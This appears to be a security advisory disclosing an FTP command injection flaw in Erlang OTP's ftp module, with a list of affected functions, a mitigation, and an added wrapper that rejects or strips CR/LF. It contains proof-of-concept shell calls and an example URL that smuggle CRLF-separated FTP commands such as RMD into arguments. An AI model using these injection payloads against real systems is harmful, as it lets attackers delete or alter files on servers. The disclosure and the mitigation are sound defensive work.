Hi,

This has been reported to the erlang-bugs mailing list:
http://erlang.org/pipermail/erlang-bugs/2014-January/003998.html

There is an FTP Command Injection vulnerability in the "ftp" module. All those
functions that write any string argument to the control socket seem to be
vulnerable:

user/3
user/4
account/2
cd/2
ls/2
nlist/2
rename/3
delete/2
mkdir/2
rmdir/2
recv/2
recv/3
recv_bin/2
recv_chunk_start/2
send/3
send_bin/3
send_chunk_start/2
append_chunk_start/2
append/2
append/3
append_bin/3

Vulnerability Description
-------------------------

By injecting a \r\n sequence followed by a new command in a function argument
you get the ftp module to write the whole string to the socket. E.g. the
following Erlang shell session:

1> inets:start().
ok
2> {ok, Pid} = inets:start(ftpc, [{host, "127.0.0.1"}]).
{ok,<0.46.0>}
3> ftp:user(Pid, "anonymous", "password\r\nCWD pub\r\nMKD new_dir").
ok
4> ftp:cd(Pid, "/pub\r\nRMD new_dir\r\nPASV").
ok

generates the following FTP session:

FTP command: Client "127.0.0.1", "USER anonymous"
FTP response: Client "127.0.0.1", "331 Please specify the password."
FTP command: Client "127.0.0.1", "PASS <password>"
FTP response: Client "127.0.0.1", "230 Login successful."
FTP command: Client "127.0.0.1", "CWD pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "MKD new_dir"
FTP response: Client "127.0.0.1", "257 "/pub/new_dir" created"
FTP command: Client "127.0.0.1", "CWD /pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "RMD new_dir"
FTP response: Client "127.0.0.1", "250 Remove directory operation successful."
FTP command: Client "127.0.0.1", "PASV"
FTP response: Client "127.0.0.1", "227 Entering Passive Mode (127,0,0,1,130,161)."

Attack Scenario Example
-----------------------

A web server allows users to navigate and download documents. Internally the
web server connects to a private ftp server using the OTP "ftp" module.

An attacker might take advantage of the vulnerability to execute actions that
aren't supposed to be exposed, e.g. delete a directory by requesting:

http://www.example.com/list_dir.yaws?dir=/docs/%0d%0aRMD+/docs

Tested on
---------

- Erlang OTP: R15B03
- Ubuntu 12.04 x86_64
- FTP Server: vsftpd

Mitigation
----------

Until this is fixed and the proper sanitization is implemented within the ftp
module, string arguments should get "\r" and "\n" removed before being passed
to these functions.

Sebastián Tello
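One way for a caller to apply the mitigation above while the ftp module itself is unfixed, as an added example that is not part of the original report: a thin wrapper module (the name safe_ftp, its check_arg/1, strip_crlf/1 and guarded/2 helpers are hypothetical) that inspects every string argument for CR or LF bytes before delegating to the real ftp:user/3, ftp:cd/2 and ftp:delete/2. The web-server scenario matters here because %0d%0a in the query string is URL-decoded into a real "\r\n" before the argument reaches the ftp call, so the check has to run on the decoded string the ftp function would actually send.

```erlang
%% Added example (not from the report): wrapper that keeps CR/LF out of the
%% FTP control socket. Module and helper names are hypothetical.
-module(safe_ftp).
-export([check_arg/1, strip_crlf/1, user/3, cd/2, delete/2]).

%% Reject-by-default policy: ok when the argument carries no "\r" or "\n",
%% otherwise {error, {crlf_in_argument, Arg}} and nothing is written.
check_arg(Arg) when is_list(Arg) ->
    case lists:any(fun(C) -> C =:= $\r orelse C =:= $\n end, Arg) of
        true  -> {error, {crlf_in_argument, Arg}};
        false -> ok
    end;
check_arg(Arg) when is_binary(Arg) ->
    check_arg(binary_to_list(Arg)).

%% Strip variant, exactly what the report recommends: drop every "\r" and
%% "\n" so a single FTP command line is all the module can emit.
strip_crlf(Arg) when is_list(Arg) ->
    [C || C <- Arg, C =/= $\r, C =/= $\n];
strip_crlf(Arg) when is_binary(Arg) ->
    list_to_binary(strip_crlf(binary_to_list(Arg))).

%% Wrappers around the vulnerable OTP functions named in the report.
user(Pid, User, Pass) ->
    guarded([User, Pass], fun() -> ftp:user(Pid, User, Pass) end).

cd(Pid, Dir) ->
    guarded([Dir], fun() -> ftp:cd(Pid, Dir) end).

delete(Pid, File) ->
    guarded([File], fun() -> ftp:delete(Pid, File) end).

%% Run check_arg/1 over every argument; only call the ftp function when all
%% of them are clean. The comprehension keeps just the {error, _} results.
guarded(Args, Fun) ->
    case [E || A <- Args, {error, E} <- [check_arg(A)]] of
        []      -> Fun();
        [E | _] -> {error, E}
    end.
```

With this in place the payloads from the shell session above never reach the server: safe_ftp:cd(Pid, "/pub\r\nRMD new_dir\r\nPASV") returns {error, {crlf_in_argument, "/pub\r\nRMD new_dir\r\nPASV"}} while safe_ftp:cd(Pid, "/pub") delegates to ftp:cd/2 unchanged. Rejecting is preferred over stripping for paths and names, because strip_crlf("/docs/\r\nRMD /docs") would silently turn into a CWD to "/docs/RMD /docs", a different request than the caller thought it was making; strip_crlf/1 is kept for callers that want the report's drop-in behaviour.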